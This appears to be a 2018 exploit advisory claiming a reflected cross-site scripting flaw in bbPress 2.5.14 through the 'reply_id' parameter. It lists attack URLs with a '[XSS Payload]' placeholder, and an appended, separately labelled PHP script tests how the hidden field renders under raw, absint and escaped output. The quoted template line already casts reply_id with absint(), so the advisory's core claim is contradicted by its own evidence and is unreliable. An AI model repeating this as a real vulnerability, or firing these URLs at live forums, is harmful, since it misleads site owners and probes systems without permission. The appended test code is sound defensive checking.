bbPress 2.5.14 - Cross Site Scripting Vulnerability

2018.06.25
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

#-------------------------------------------------------#
# Exploit Title: bbPress 2.5.14 - Cross Site Scripting Vulnerability
# Exploit Author: Iran Cyber Security Group
# Date: 2018-06-25
# Vendor Homepage: https://bbpress.org/
# Tested on: Kali Linux
#--------------------------------------------------------#
# PoC:

The vulnerability is in the includes\common\template.php file, at line 1691:

<input type="hidden" name="bbp_reply_id" id="bbp_reply_id" value="<?php echo absint( $_GET['reply_id'] ); ?>" />

Method 1:
You can use the "reply_id" parameter to set your XSS payloads.

Exploits:
/?action=move&reply_id=6
/?action=split&reply_id=6
/?action=bbp_toggle_reply_trash&sub_action=trash&reply_id=6&_wpnonce=369b14d8cc
/?action=bbp_toggle_reply_spam&reply_id=6&_wpnonce=8d6a680387

Demo:
http://127.0.0.1/wordpress/forums/reply/test/edit/?action=move&reply_id=6[XSS Payload]

Method 2:
You can exploit this vulnerability by "replay" a post in the forum

#---------------------------------------------------------#
| Discovered By: Unkn0wn [unkn0wn@danwin1210.me]
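
A way to check what the quoted template line writes into the value attribute for a given reply_id, as an added example (not code from the advisory or from bbPress). absint_standin() is an assumed stand-in for WordPress's absint(), render_hidden_field() and attribute_intact() are hypothetical helpers, and the sample inputs are constructed.

```php
<?php
// Added triage example; not code from the advisory or from bbPress.

// Assumption: stand-in mirroring WordPress's absint() (absolute value of an integer cast).
function absint_standin($maybeint) {
    return abs((int) $maybeint);
}

// Hypothetical helper: three ways of filling the hidden field's value attribute.
function render_hidden_field(string $mode, string $reply_id): string {
    switch ($mode) {
        case 'raw':     // unescaped echo, shown for contrast only
            $value = $reply_id;
            break;
        case 'absint':  // the expression quoted from template.php line 1691
            $value = (string) absint_standin($reply_id);
            break;
        case 'escaped': // generic attribute escaping, for fields that are not numeric
            $value = htmlspecialchars($reply_id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            break;
        default:
            throw new InvalidArgumentException("unknown mode: $mode");
    }
    return '<input type="hidden" name="bbp_reply_id" id="bbp_reply_id" value="' . $value . '" />';
}

// Hypothetical helper: true when the output is still exactly one <input> tag
// whose value attribute contains no quote or angle bracket.
function attribute_intact(string $html): bool {
    $pattern = '/^<input type="hidden" name="bbp_reply_id" id="bbp_reply_id" value="[^"<>]*" \/>$/';
    return preg_match($pattern, $html) === 1;
}

// Constructed sample inputs (not taken from the advisory); the markup one is an inert marker.
$samples = ['6', '-6', '6abc', '6"><b>constructed-marker</b>'];

foreach (['raw', 'absint', 'escaped'] as $mode) {
    foreach ($samples as $input) {
        $html  = render_hidden_field($mode, $input);
        $state = attribute_intact($html) ? 'intact' : 'BROKEN';
        printf("%-8s %-34s %-7s %s\n", $mode, var_export($input, true), $state, $html);
    }
}
```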



Copyright 2018, cxsecurity.com

 
